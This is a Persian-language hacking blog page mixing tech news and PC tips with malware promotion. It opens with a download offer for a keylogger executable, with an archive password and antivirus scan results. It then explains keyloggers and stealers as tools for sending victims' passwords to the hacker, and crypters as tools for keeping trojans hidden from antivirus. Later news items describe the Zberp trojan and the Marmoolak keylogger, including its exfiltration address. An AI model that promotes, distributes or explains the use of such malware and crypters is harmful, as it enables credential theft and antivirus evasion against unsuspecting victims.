بوت هک کرک

بوت هک کرک

اخبار IT، آموزش امنیت و راه های مقابه با هک
بوت هک کرک

بوت هک کرک

اخبار IT، آموزش امنیت و راه های مقابه با هک

دانلود Keylogger


Scan Server
File Name: key.exe
File Size: 520.5 KB
Scan Date: 2014-08-01
Scan Result: 16/34

MD5: 27f43c32e7c82a7650adb14b70bb6527
Verified By NoDistribute:Virus Scan Result

AVG Free: Clean
Avast:Win32:Malware-gen
AntiVir (Avira):TR/Hijacker.A.31
BitDefender:Gen:Heur.MSIL.Krypt.5
Clam Antivirus: Clean
COMODO Internet Security: Clean
Dr.Web:Trojan.PWS.Stealer.13025
eTrust-Vet: Clean
F-PROT Antivirus: Clean
F-Secure Internet Security:Gen:Heur.MSIL.Krypt.5
G Data:Gen:Heur.MSIL.Krypt.5, Win32:Malware-gen
IKARUS Security:HackTool.Win32.MSNPass
Kaspersky Antivirus:not-a-virus:HEUR:Monitor.MSIL.KeyLogger.heur
McAfee: Clean
MS Security Essentials:TrojanSpy:MSIL/Golroted.A
Norman:Injector.gen!r
Norton Antivirus: Clean
Panda Security: Clean
A-Squared:Gen:Heur.MSIL.Krypt.5 (B)
Quick Heal Antivirus:Malware.Generic.Dnt5
Solo Antivirus: Clean
Sophos:Mal/MsilKlog-D
Trend Micro Internet Security: Clean
VBA32 Antivirus:<EMB-PE>�0000000 : infected Trojan.MSIL.Inject
Zoner AntiVirus: Clean
Ad-Aware: Clean
BullGuard:Gen:Heur.MSIL.Krypt.5
FortiClient: Clean
K7 Ultimate: Clean
NANO Antivirus:Trojan.Win32.Siggen4.dcdjgo, Trojan.Win32.Injector.dcgzte
Panda CommandLine: Clean
SUPERAntiSpyware: Clean
Twister Antivirus: Clean
VIPRE: Clean

دانلود
حجم: 1.11mg
پسورد: boot-hack-crack.ir

Keyloggers

در این تایپیک قرار هست که keylogger ها قرار گرفته بشه امیدوارم که مفید واقع بشه .

توضیح کوتاهی در مورد keylogger & stealer ها :

تعریف keylogger & stealer ها تو چند کلمه میشه ابزاری برای بدست آوردن رمز ها و کلمات عبور قربانی و همچنین ضبط و ارســـــال کلید ها تایپ

شده کیبورد توسط قربانی و ارسال اونها به Host و یا Email هکر .

Stealer:Stealer در فارسی به معنای دزد هست که به دلیل اینکه با اجرای و کلیک بر روی سرور اون در مدت زمان کوتاهی تمام رمزها و پسوردهای

قربانی رو برای شما ارسال میکنه .

Keylogger:keylogger در معنا عامیانه معنی ارسال کلیدهای زده شده رو داره . که در واقع با اجرای سرور این نوع کیلاگرها تمام کلید های زده شده

توسط شخص قربانی به Email و یا Host هکر فرستاده میشه .


نکته : keylogger فقط در یک بازه زمانی خاص توسط انتی ویروس شناسایی نمیشن و پس از مدتی شناســـایی شده و کاریی خودشون رو از دست میدن .

Crypters



سلام

در این بخش قرار هست که کریپترها قرار گرفته بشه امیدوارم که مفید واقع بشه .

توضیح کوتاهی در مورد کریپتر ها :

تعریف کریپتر = Crypter تو چند کلمه میشه ابزاری برای پنهـــــان کردن Keylogger ها و Trojan ها از دید آنتی ویروس ها اســـت که در واقع هـمه

کیلاگرها و تروجانها بعد از یک مدت توسط انتی ویروس ها شناسایی میشن که با این روش و با استفاده از این ابزار ها به راحتی میشه سرور کیلاگر

و یا تروجان خودتون رو از دیدی انتی ویروس ها تا مدتی دور نگه دارید .

نکته : کریپتر ها فقط در یک بازه زمانی خاص توسط انتی ویروس شناسایی نمیشن و پس از مدتی شناســـایی شده و کاریی خودشون رو از دست میدن .

ترفندی برای فهمیدن مشخصات قطعات داخلی سیستم


شاید شما هم دوست داشته باشید بدانید که در سیستم شما چه میگذرد و چه قطعاتی درون کیس کامپیوتر شما قرار دارند.

مثلا CPU سیستم شما از چه نوعی است؟ میزان Ram و حافظه کارت گرافیک تان چقدر است؟

نرم افزارهایی وجود دارند که میتوانند مشخصات دقیق قطعات سیستم را به شما بدهند. ولی ما میخواهیم بدون هیچ گونه نرم افزار خاص و فقط از طریق ویندوز این اطلاعات را به دست بیاوریم.

از منوی استارت وارد Run شده و عبارت wmic را تایپ کنید.

حالا یک صفحه مشکی باز میشود. چند لحظه صبر کنید تا خط فرمان به صورت زیر درآید:

wmic:root\cli>


حالا برای فهمیدن مشخصات مادربرد کامپیوتر، عبارت Baseboard را تایپ کنید و Enter را بزنید. مشخصات مادربرد کامپیوتر شما و تمامی جزئیات آن به نمایش در می آید.

برای فهمیدن این که پردازنده سیستم شما چیست، عبارت CPU را تایپ کنید و Enter را بزنید تا مشخصات آن را ببینید.


برای اینکه لیست کل فرمان های این محیط را مشاهده کنید، عبارت ?/ را تایپ کنید و Enter را بزنید.

لیست تمامی دستورات برای شما نمایان میشود و شما میتوانید با تایپ هر کدام، نتیجه آن فرمان را ببینید.

ده ترفند جهت خنک نگه‏داشتن قطعات کامپیوتر


یکی از مشکلات شایعی که به هنگام کار با کامپیوتر برای کاربران پیش می‏آید، گرم شدن بیش از حد قطعات سخت افزاری کامپیوتر است. این موضوع علاوه بر آسیب‏رسانی به سخت‏افزارها میتواند عمر آن‏ها را نیز کوتاه‏تر کند و حتی تأثیر منفی بر روی عملکرد نرم افزارهای در حال اجرا بگذارد. برای حل این مشکل، قصد داریم تا هم‏اکنون به معرفی 10 ترفند کاربردی جهت خنک نگه‏داشتن قطعات کامپیوتر بپردازیم.
1- اگر از کامپیوتر استفاده نمی*کنید، حتماً آن را خاموش کنید. این یکی از بهترین راه*ها برای صرفه*جویی در مصرف برق و همچنین جلوگیری از تولید گرمای زیاد می*باشد.

2- پاورهای موثر در انرژی، در از بین رفتن انرژی زیاد که تبدیل به گرمای غیرقابل مصرف می*شوند جلوگیری می*کنند. آن دسته از پاورهایی که واقعا در انرژی مؤثرند، امروزه حتما دارای لیسانس 80Plus می*باشند. این مسئله باید در هنگام خرید مورد توجه و اهمیت قرار گیرد.

3- در هنگام نصب خنک کننده CPU باید به این نکته توجه شود که میزان حساب شده این از خمیر سیلیکن (خمیر هادی گرما) در میان پردازشگر و رادیاتور فن ریخته شود. چرا که هنگام گرم شدن پردازشگر، انرژی زیادی نیز مصرف می*شود.

4- بهتر است کامپیوتر در مکان خنکی قرار داده شود. ارتباط مستقیم با نور آفتاب و یا هر منبع گرمایی دیگر مانند لامپ*های هالوژن باعث گرمای بسیار زیاد کامپیوتر می*شوند.

5- کامپیوتر احتیاج به فضایی کافی برای گردش هوایی مؤثر می*باشد. این مسئله علی*الخصوص برای نوت*بوک*ها صدق می*کند. توجه داشته باشید که به هیچ وجه کامپیوتر را بر روی متکا، پتو و یا هر چیزی که به گونه*ای دریچه*های هوا را مسدود کند قرار ندهید.

6- کیس کامپیوتر و همچنین در صورت وجود، فیلترهای هوا، باید به صورت منظم تمیز شوند تا از گرد و خاک بر روی کامپیوتر محافظت شود. جمع شدن گرد و خاک می*تواند باعث ایزوله شدن قطعات الکترونیکی شده، مانع جریان هوا شده و اینگونه هواگیری را با دردسر مواجه کنند.

7- یکی از مسائل مهم دیگر برای سیستم جریان هوای عالی و کافی می*باشد. به همین علت هم مسئله زیر صدق می*کند:
جلوگیری از ایجاد کابل*های تو در تو، زیاد و به هم پیچیده در کیس سیستم.
برای این کار کافی است هر کدام از کابل*ها را به کابل مورد نظر ارتباط داده و سپس آنها را از سیستم مدیریت کابل*ها عبور داد. (ترفندستان)

8- برای خنک نگه داشتن آن دسته از قطعاتی که در مسیر مستقیم جریان هوا نمی*باشند، یک سیستم خنک کننده مؤثر و هدف دار بسیار مهم است.

9- بهتر است به فکر یک خنک کننده آبی نیز برای پردازشگر خود باشید، چرا که هم سیستم خنک کننده*اش بسیار عالی می*باشد و هم صدایی کمتر از صدای خنک کننده*های عادی دارد.

10- از آنجا که در نوت*بوک*ها، خنک*کننده*ها و دریچه*ها کوچک*تر می*شوند، مسئله استفاده از سیستم خنک کننده مناسب بسیار مهم است. یک خنک کننده ماهرانه و متناسب می*تواند عمر دستگاه و بدنه را تا چند سال افزایش بخشد.

تروجان بانکی جدید Zberp


نویسندگان Zberp نیز از همین تکنیک استفاده کرده‌اند که این بدان معناست که از کشف شدن توسط برنامه‌های ضدبدافزار جلوگیری می‌کنند، چرا که به‌روز رسانی‌های پیکربندی را به شکل پنهان درون یک تصویر لوگوی اپل ارسال می‌کنند.
به نظر می‌رسد که یک تروجان جدید که کاربران ۴۵۰ موسسه مالی در سراسر دنیا را هدف قرار داده است، عملکرد و ویژگی‌های خود را مستقیماً از تروجان‌های بدنام زئوس و Carberp به ارث برده باشد.

به گزارش ایتنا از مرکز ماهر، این تهدید جدید که توسط محققان امنیتی شرکت Trusteer (زیرمجموعه آی‌بی‌ام) Zberp نام گرفته است، ویژگی‌های متنوعی دارد. این تروجان می‌تواند اطلاعاتی شامل آدرس آی‌پی و نام را در مورد سیستم‌های آلوده جمع‌آوری کند، از صفحه نمایش تصویر تهیه کرده و برای یک سرور راه دور ارسال نماید، اطلاعات اعتباری FTP و POP۳، گواهینامه‌های SSL و اطلاعات وارد شده در فرم‌های وب را سرقت کند، سشن‌های مرورگر را سرقت نماید و اقدام به قرار دادن محتوای جعلی در صفحات باز وب کند و با استفاده از پروتکل‌های VNC و RDP، ارتباط راه دور جعلی (remote desktop) برقرار نماید.

محققان Trusteer اعتقاد دارند که Zberp یک ویرایش از ZeusVM است. ZeusVM یک ویرایش اخیر از تروجان زئوس است که کد منبع آن در سال ۲۰۱۱ در فروم‌های زیرزمینی لو رفته است. ZeusVM در ماه فوریه کشف شد و با نوجه به اینکه نویسندگان آن از پنهان‌نگاری (steganography) برای پنهان کردن داده‌های پیکربندی در درون تصاویر استفاده کرده‌اند، از سایر نسخه‌های زئوس متمایز می‌گردد.

نویسندگان Zberp نیز از همین تکنیک استفاده کرده‌اند که این بدان معناست که از کشف شدن توسط برنامه‌های ضدبدافزار جلوگیری می‌کنند، چرا که به‌روز رسانی‌های پیکربندی را به شکل پنهان درون یک تصویر لوگوی اپل ارسال می‌کنند.

البته این تهدید جدید از تکنیک‌های hook نیز برای کنترل مرورگر استفاده می‌کند که به نظر می‌رسد این ویژگی را از Carberp قرض گرفته باشد. Carberp نیز یک تروجان بانکی است که کد منبع آن در سال گذشته لو رفت.

به گفته یکی از محققان Trusteer، پس از لو رفتن کد منبع Carberp به صورت عمومی انتظار می‌رفت که در زمان کوتاهی مجرمان سایبری اقدام به ترکیب کد منبع زئوس با کد منبع Carberp نمایند و یک بدافزار جدید تولید کنند.

Zberp همچنین مشابه ZeusVM کلید رجیستری خود را در هنگام اجرا حذف می‌کند و به محض اینکه شات‌داون شدن سیستم را تشخیص داد، آن را باز می‌گرداند.

بنا بر گزارش Virus-Total، تروجان Zberp در ابتدای کشف از چشم اغلب نرم‌افزارهای آنتی‌ویروس پنهان باقی می‌ماند.

HUAWEI سرعت اینترنت را به ۱۰ گیگابایت بر ثانیه می‌‏رساند


بنا بر اعلام شرکت هوآوی، این سرعت ۱۰ برابر سریع‏‌ترین اینترنت وای‏‌فای موجود در جهان است. سنگ زیربنای اینترنت ۱۰ گیگابایتی هوآوی فناوری‏‏‌هایی از قبیل «MIMO-OFDA»، تخصیص طیف هوشمند، هماهنگ‏‌سازی بسامد‌ها و دسترسی ترکیبی است.
شرکت هوآوی (HUAWEI) اعلام کرده است تا سال ۲۰۱۸ شبکه وای‏‌فای اینترنت ۱۰ گیگابایت بر ثانیه عرضه خواهد کرد.

به گزارش همکاران سیستم و به نقل از وب‏سایت theinquirer، شرکت چینی هوآوی اعلام کرده است قصد دارد تا سال ۲۰۱۸ شبکه وای‏‌فای اینترنتی عرضه کند که سرعت آن ۱۰ گیگابایت بر ثانیه است. هوآوی طرح عرضه این نوع اینترنت به صورت آزمایشی را با موفقیت به پایان رسانده است.

این شرکت اعلام کرده است عرضه آزمایشی این نوع اینترنت را در محوطه سـاختمان اصلی خود در شهر شنزن چین با موفقیت به پایان رسانده است. هوآوی موفق شده است با این شبکه‏ اینترنتی داده‏‌ها و اطلاعات را با ســرعت ۳۵. ۱۰ گیگابایت بر ثانیه و با فرکانس ۵ گیگاهرتز منتقل کند.

بنا بر اعلام شرکت هوآوی، این سرعت ۱۰ برابر سریع‏‌ترین اینترنت وای‏‌فای موجود در جهان است. سنگ زیربنای اینترنت ۱۰ گیگابایتی هوآوی فناوری‏‏‌هایی از قبیل «MIMO-OFDA»، تخصیص طیف هوشمند، هماهنگ‏‌سازی بسامد‌ها و دسترسی ترکیبی است.

بر اساس این گزارش، اینترنت ۱۰ گیگابایتی هوآوی با استانداردهای بین‏‌المللی و تراشه‏‌های موجود سازگاری خواهد داشت.

این شرکت پیش از این در ماه نوامبر اعلام کرده بود ۶۰۰ میلیون دلار سرمایه به بخش پژوهش‏های مربوط به شبکه‏‌های نسل پنجم (۵G) تزریق کرده است و انتظار دارد تا سال ۲۰۲۰ بتواند اینترنتی با سرعت ۱۰ گیگابایت بر ثانیه عرضه کند.

کشف حفره امنیتی جدید در مسیر وای‌ فای اندروید


گوشی های اندروید که در حال حاضر نسخه 4.1.1 از Jelly Bean را اجرا می‌کنند به واسطه ارتباطات بی‌سیم آُسیب پذیر هستند. یک مهاجم می‌تواند از طریق یک شبکه آلوده، ارتباطی را به دستگاه قربانی باز کند و اطلاعاتی را که می خواهد از روی گوشی قربانی بردارد.
دو ماه بعد از کشف حفره امنیتی Heartbleed همچنان حفره‌های مشابه آن وجود دارد و این بار حفره مشابهی کشف شده که امکان نفوذ به دستگاه‌های اندرویدی را از مسیر شبکه وای فای به هکر‌ها می‌دهد.

به گزارش فارس به نقل از  theinquirer   لوئیس گرانجیا متخصص امنیت و مدیر خدمات امنیتی در SysValue برداری را کشف کرده است که از طریق آن می‌توان به دستگاه های بی سیم و گوشی های اندروید حمله کرد.

حفره کشف شده جدید که  Cupid  نام دارد می تواند با عملکردی مشابه آسیب‌پذیری  Heartbleed عمل کند با این تفاوت که این حمله بر روی ارتباطات بی‌سیم انجام می‌شود.

هنوز مشخص نیست که چه تعدادی از دستگاه‌ها ممکن است تحت تاثیر این آسیب پذیری قرار داشته باشند اما سرعت گسترش این حمله بیشتر از آسیب پذیری اصلی Heartbleed است. مسیریاب مبتنی بر EAP آسیب پذیرترین دستگاه ها نسبت به حمله Cupid  هستند.

گرانجیا می‌گوید:  این حمله قبل از لاگین و در مرحله تایید هویت اتفاق می‌افتد بنابراین برای اجرای آن به هیچ اعتبارنامه‌ای نیاز نیست.

گوشی های اندروید که در حال حاضر نسخه 4.1.1 از Jelly Bean را اجرا می‌کنند به واسطه ارتباطات بی‌سیم آُسیب پذیر هستند. یک مهاجم می‌تواند از طریق یک شبکه آلوده، ارتباطی را به دستگاه قربانی باز کند  و اطلاعاتی را که می خواهد از روی گوشی قربانی بردارد.

میلیون ها دستگاه اندروید هم چنان از Jelly Bean نسخه 4.1.1 استفاده می کنند اگرچه نسخه به روز رسانی شده آن همزمان با کشف  آسیب پذیری اصلی Heartbleed منتشر شد و به کاربران توصیه شد تا از سیستم عامل خود را به نسخه جدید به روز رسانی کنند. ممکن است سیستم عامل های iOS و Mac OSX هم تحت تاثیر حمله Cupid قرار داشته باشند.

جمع‌آوری میلیونی عکس از اینترنت



برمبنای اطلاعات جمع‌آوری شده مربوط به سال ۲۰۱۱ میلادی آژانس امنیت ملی آمریکا روزانه میلیون‌ها عکس جمع‌آوری می‌کرده و از این مجموعه ۵۵ هزار عکس با کیفیت مناسب را برای تشخیص هویت افراد به کار می‌برده است.
برمبنای تازه‌ترین افشاگری ادوارد اسنودن، آژانس امنیت ملی آمریکا انبوهی از عکس انسان‌ها را از اینترنت جمع‌آوری کرده تا برای تشخیص هویت افراد از آنها بهره گیرد.

به گزارش ایسنا، روزنامه نیویورک تایمز در ارتباط با تازه‌ترین افشاگری ادوارد اسنودن نوشته است که هدف سازمان‌های امنیتی آمریکا از جمع‌آوری گسترده عکس انسان‌ها از اینترنت مقایسه آنها با نرم افزارهای تشخیص هویت و تعیین هویت افراد در هر نقطه جهان بوده است.

برمبنای اطلاعات جمع‌آوری شده مربوط به سال ۲۰۱۱ میلادی آژانس امنیت ملی آمریکا روزانه میلیون‌ها عکس جمع‌آوری می‌کرده و از این مجموعه ۵۵ هزار عکس با کیفیت مناسب را برای تشخیص هویت افراد به کار می‌برده است.

اطلاعات فاش شده نشان می‌دهند که سازمان امنیت ملی آمریکا همچنین در پی جمع‌آوری اثر انگشت و هرگونه اطلاعات بیومتریک دیگر مربوط به افراد مختلف بوده است.

گفته می شود که مهم‌ترین نرم‌افزار آژانس امنیت ملی آمریکا نامش "Tundra Freeze" نام دارد و می‌تواند هویت افراد را حتی زمانی که فرد موی سرش را از ته تراشیده باشد، تشخیص دهد. این نرم افزار اما در ارتباط با سبیل افراد با مشکل روبه رو می‌شود.

به گزارش دویچه وله، حدود یک سال پیش بود که افشاگری‌های ادوارد اسنودن جنجال‌های فراوانی در سراسر جهان برانگیخت. شنودهای تلفنی میلیونی سازمان امنیت ملی آمریکا سبب شد که این سازمان با انتقادهای فراوان جهانی مواجه شود.

بدافزار ایرانی مارمولک


نویسندگان بدافزارها اغلب برای جلوگیری از شناسایی شدن، از ابزارهای ارزان و ساده‌ای استفاده می‌کنند که بدافزار را با یک برنامه runtime فشرده سازی یا رمزگذاری، تغییر می‌دهد. البته در این مورد خاص، فایل‌های مرتبط توسط یک نسخه تغییر یافته از ابزار مشهور UPX پنهان شده‌اند.
حملات هدفمند از چندین مرحله تشکیل می‌شوند که به زنجیره قتل APT شناخته می‌شوند. مهاجمان به عنوان بخشی از فاز مسلح کردن خود، اغلب Payloadی را در یک فایل قرار می‌دهند که زمانی که نصب می‌گردد، در فاز دستور و کنترل (C۲) به مهاجم متصل می‌شود.

به گزارش مرکز ماهر، یک payload بسیار معمول مورد استفاده بسیاری از بدافزارهای سرقت کلمه عبور، نرم افزار ثبت ضربات صفحه کلید (keylogger) است. هدف از ثبت ضربات صفحه کلید این است که ضربات صفحه کلید کاربر ضبط شود و اطلاعات اعتباری وی و لینک‌ها به منابع داخلی و خارجی جمع‌آوری گردد.

اخیراً بدافزار مارمولک که یک نرم افزار ایرانی ثبت ضربات صفحه کلید است با MD5 برابر با F09D2C65F0B6AD55593405A5FD3A7D97 شناسایی شده است.

نخستین ظهور این keylogger به یک فروم در خاورمیانه باز می‌گردد. اگرچه ممکن است برخی keylogger ها ضربات صفحه کلید را برای مقاصد قانونی ثبت نمایند، اما این نرم‌افزار قربانیان خود را با یک payload پنهان گمراه می‌سازد.

به نظر می‌رسد که تولید کننده این بدافزار با قرار دادن آن در فروم مذکور، قصد حمله به سایر اعضای این فروم را داشته است که این کار تکنیکی مرسوم است.

نویسندگان بدافزارها اغلب برای جلوگیری از شناسایی شدن، از ابزارهای ارزان و ساده‌ای استفاده می‌کنند که بدافزار را با یک برنامه runtime فشرده سازی یا رمزگذاری، تغییر می‌دهد. البته در این مورد خاص، فایل‌های مرتبط توسط یک نسخه تغییر یافته از ابزار مشهور UPX پنهان شده‌اند.

این فایل در هنگام اجرا یک کپی از خود با نام Mcsng.sys در فولدر Sysytem32 ایجاد می‌کند. این بدافزار همچنین پروسه‌ای را اجرا می‌کند که فایل ۱stmp.sys را در فولدر system32\config جایگذاری کرده و می‌نویسد.

اگرچه پسوند این فایل .sys (فایل سیستمی) است، اما در حقیقت این فایل سیستمی نیست. هدف این فایل این است که به عنوان یک فایل لاگ عمل کند که محتوی ضربات صفحه کلید کاربر است که به صورت رمز شده ذخیره شده‌اند.
هربار که یک کلید فشرده می‌شود، این پروسه ضربات صفحه کلید را ثبت می‌کند، آن را رمز کرده و به 1stmp.sys اضافه می‌کند.

اگرچه الگوریتم رمزگذاری مورد استفاده برای این کار ساده است، ولی از رمزگذاری انتخابی با دو تکنیک استفاده می‌کند: هر بایت درصورتی‌که فرد باشد با استفاده از تکنیک ۱ رمز می‌شود و درصورتی‌که زوج باشد، با استفاده از تکنیک ۲ رمزگذاری می‌گردد.

پس از رمزگشایی نه تنها ضربات صفحه کلید قابل مشاهده هستند، بلکه اطلاعات زمانی ثبت این اطلاعات نیز قابل مشاهده است. پس از ثبت و رمز گذاری ضربات صفحه کلید، این بدافزار این اطلاعات را برای نویسنده خود ایمیل می‌کند.

این بدافزار همچنین نام کامپیوتر و نام کاربر را نیز برای سازنده خود می‌فرستد. لاگ رمز شده به آدرس marmoolak@red-move.tk ارسال می‌گردد که بر روی دامنه‌ای میزبانی می‌شود که به میزبانی بدافزارها مشهور است.

مک‌آفی این تروجان keylogger و نسخه‌های مختلف آن را با عنوان Keylog-FAG می‌شناسد. برای جلوگیری از آلوده شدن توسط انواع keylogger ها، باید آنتی‌ویروس خود را به‌روز نگه دارید و از منابع نامطمئن دانلود نکنید.